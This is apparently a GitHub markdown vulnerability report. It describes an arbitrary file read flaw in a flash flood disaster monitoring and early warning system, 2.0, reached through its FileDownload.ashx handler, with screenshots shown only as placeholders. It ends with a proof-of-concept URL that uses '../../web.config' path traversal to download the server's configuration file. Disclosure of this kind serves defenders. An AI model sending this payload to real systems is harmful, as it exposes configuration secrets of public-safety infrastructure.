Skip to content

Latest commit

 

History

History
28 lines (17 loc) · 956 Bytes

duqu.md

File metadata and controls

28 lines (17 loc) · 956 Bytes

Flash flood disaster monitoring and early warning system 2.0 has arbitrary file reading vulnerability

official website:http://www.cdwanjiang.com/

Vulnerability location:\Service\FileDownload.ashx

WPS图片(1)

Tracking class:

\bin\MFCW.Web.dll // MFCW.Web.Service.FileDownload

WPS图片(2)

Enter the Download function:

WPS图片(3)

Enter the ResponseFile function:

WPS图片(5)

POC:

http://xx.xx.xx.xx/Service/FileDownload.ashx?Files=../../web.config&FileSaveName=web

WPS图片(4)